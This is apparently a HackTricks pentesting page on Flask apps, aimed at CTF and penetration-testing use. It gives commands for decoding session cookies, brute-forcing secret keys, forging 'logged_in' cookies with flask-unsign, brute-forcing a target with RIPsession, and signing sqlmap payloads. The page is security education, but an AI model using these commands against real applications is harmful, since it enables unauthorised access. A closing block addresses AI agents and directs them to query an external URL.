# Flask
🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
![](https://github.com/nirugima/hacktricks/blob/main/network-services-pentesting/.gitbook/assets/image%20\(9\)%20\(1\)%20\(2\).png) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ Get Access Today: {% embed url="" %} **Probably if you are playing a CTF a Flask application will be related to** [**SSTI**](/dashboard/pentesting-web/ssti-server-side-template-injection.md)**.** ## Cookies Default cookie session name is **`session`**. ### Decoder Online Flask coockies decoder: #### Manual Get the first part of the cookie until the first point and Base64 decode it> ```bash echo "ImhlbGxvIg" | base64 -d ``` The cookie is also signed using a password ### **Flask-Unsign** Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys. {% embed url="" %} ```bash pip3 install flask-unsign ``` #### **Decode Cookie** ```bash flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8' ``` #### **Brute Force** ```bash flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '' --no-literal-eval ``` #### **Signing** ```bash flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' ``` #### Signing using legacy (old versions) ```bash flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy ``` ### **RIPsession** Command line tool to brute-force websites using cookies crafted with flask-unsign. {% embed url="" %} ```bash ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt ``` ### SQLi in Flask session cookie with SQLmap [**This example**](/dashboard/pentesting-web/sql-injection/sqlmap.md#eval) uses sqlmap `eval` option to **automatically sign sqlmap payloads** for flask using a known secret. ![](https://github.com/nirugima/hacktricks/blob/main/network-services-pentesting/.gitbook/assets/image%20\(9\)%20\(1\)%20\(2\).png) \ Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ Get Access Today: {% embed url="" %}
🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://breached.gitbook.io/dashboard/network-services-pentesting/pentesting-web/flask.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.